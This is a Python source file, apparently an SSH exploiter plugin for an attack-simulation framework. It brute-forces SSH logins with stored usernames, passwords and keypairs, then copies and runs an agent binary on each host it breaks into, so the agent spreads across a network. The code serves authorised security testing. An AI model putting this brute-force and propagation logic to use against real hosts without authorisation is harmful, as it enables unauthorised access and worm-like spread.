import logging
from functools import partial
from pprint import pformat
from typing import Any, Dict

from agentpluginapi import (
    ExploiterResult,
    IAgentBinaryRepository,
    IAgentCommandBuilderFactory,
    IAgentEventPublisher,
    IPropagationCredentialsRepository,
    LocalMachineInfo,
    TargetHost,
)
from monkeytypes import AgentID, Event, Password, SSHKeypair, Username
from plugintoolbox import (
    BruteForceCredentialsProvider,
    BruteForceExploiter,
    generate_brute_force_credentials,
    get_agent_dst_path,
    identity_type_filter,
    secret_type_filter,
)

from .ssh_command_builder import build_ssh_command
from .ssh_options import SSHOptions
from .ssh_remote_access_client import SSH_PORTS
from .ssh_remote_access_client_factory import SSHRemoteAccessClientFactory

logger = logging.getLogger(__name__)


def should_attempt_exploit(host: TargetHost) -> bool:
    return not set(SSH_PORTS).issubset(host.ports_status.tcp_ports.closed)


class Plugin:
    def __init__(
        self,
        *,
        plugin_name: str,
        agent_id: AgentID,
        agent_event_publisher: IAgentEventPublisher,
        agent_binary_repository: IAgentBinaryRepository,
        propagation_credentials_repository: IPropagationCredentialsRepository,
        local_machine_info: LocalMachineInfo,
        agent_command_builder_factory: IAgentCommandBuilderFactory,
        **kwargs,
    ):
        self._plugin_name = plugin_name
        self._agent_id = agent_id
        self._agent_event_publisher = agent_event_publisher
        self._agent_binary_repository = agent_binary_repository
        credentials_generator = partial(
            generate_brute_force_credentials,
            identity_filter=identity_type_filter([Username]),
            secret_filter=secret_type_filter([Password, SSHKeypair]),
        )
        self._credentials_provider = BruteForceCredentialsProvider(
            credentials_repository=propagation_credentials_repository,
            generate_brute_force_credentials=credentials_generator,
        )
        self._agent_command_builder_factory = agent_command_builder_factory

    def run(
        self,
        *,
        host: TargetHost,
        options: Dict[str, Any],
        interrupt: Event,
        **kwargs,
    ) -> ExploiterResult:
        try:
            logger.debug(f"Parsing options: {pformat(options)}")
            ssh_options = SSHOptions(**options)
        except Exception as err:
            msg = f"Failed to parse SSH options: {err}"
            logger.exception(msg)
            return ExploiterResult(error_message=msg)

        if not should_attempt_exploit(host):
            msg = f"Host {host.ip} has no open SSH ports"
            logger.debug(msg)
            return ExploiterResult(
                exploitation_success=False, propagation_success=False, error_message=msg
            )

        command_builder = partial(
            build_ssh_command,
            agent_command_builder=(
                self._agent_command_builder_factory.create_linux_agent_command_builder()
            ),
        )

        ssh_exploit_client_factory = SSHRemoteAccessClientFactory(
            host=host, options=ssh_options, command_builder=command_builder
        )

        brute_force_exploiter = BruteForceExploiter(
            exploiter_name=self._plugin_name,
            agent_id=self._agent_id,
            destination_path=get_agent_dst_path(host),
            exploit_client_factory=ssh_exploit_client_factory,
            get_credentials=self._credentials_provider,
            agent_binary_repository=self._agent_binary_repository,
            agent_event_publisher=self._agent_event_publisher,
            tags={"ssh-exploiter"},
        )

        try:
            logger.debug(f"Running SSH exploiter on host {host.ip}")
            return brute_force_exploiter.exploit_host(host, interrupt)
        except Exception as err:
            msg = f"An unexpected exception occurred while attempting to exploit host: {err}"
            logger.exception(msg)
            return ExploiterResult(error_message=msg)
